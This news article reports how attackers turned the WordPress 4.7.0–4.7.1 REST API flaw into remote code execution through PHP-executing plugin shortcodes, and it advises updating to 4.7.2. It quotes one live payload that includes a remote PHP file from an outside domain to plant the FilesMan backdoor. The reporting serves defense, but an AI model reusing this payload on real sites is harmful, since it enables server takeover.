Attackers have found a way to escalate the benign WordPress REST API flaw and use it to gain full access to a victim's server by installing a hidden backdoor.
On January 26, the WordPress team released WordPress 4.7.2, which contained a secret fix that addressed a vulnerability in the WordPress REST API.
Discovered by Sucuri, this flaw affected WordPress 4.7.0 and 4.7.1 and allowed an attacker to craft malicious HTTP requests that when sent to a WordPress site would allow the hacker to bypass authentication methods and alter the title and content of blog posts and static pages.
Because the WordPress team feared attackers would exploit this flaw right away, they didn't include details about the bug in the original announcement and only revealed its presence after a week, after a substantial number of users had updated their blogs.
Nonetheless, as anticipated, right after the bug became public, hackers started attacking WordPress sites that haven't been updated, with attacks going in a week from 67,000 defaced pages to over 2 million, at the time of writing.
The vast majority of these attacks had been simple defacements, where hacking crews just scribbled their name on a site, and nothing more.
Towards the end of last week, things turned ugly, according to WordPress security firm Sucuri, who reported seeing the first attacks that also involved remote code execution attempts.
According to Sucuri, attackers were crafting special defacement messages that included a list of WordPress shortcodes.
After a closer look at these shortcodes, the Sucuri team realized these were the shortcodes of WordPress plugins that allowed webmasters to include custom PHP code inside the text content of their pages, and have the WordPress engine execute it.
In simpler terms, attackers found a way to send their own PHP code to WordPress sites via the REST API flaw, which until then was only used to alter pre-existing text.
content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php] [php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]", "id":"61a"}
The above source code snippet, seen in live attacks, would tell the WordPress engine to execute the following PHP command every time a user would access that particular page.
This line of PHP code would include a remote PHP file on the victim's site, which would download and install the FilesMan PHP backdoor in the WordPress /wp-content/uploads/ folder.
After sending their HTTP request to a site's WordPress REST API, an attacker would only have to access the defaced page once, and then access the backdoor and take over the victim's underlying server.
The best way to thwart these types of exploitation attempts is to update your WordPress site to version 4.7.2 as soon as possible, or optionally disable any plugins that allow an editor to embed and execute PHP code. Sucuri says it detected attacks using the shortcodes associated with plugins like Exec-PHP and Insert PHP.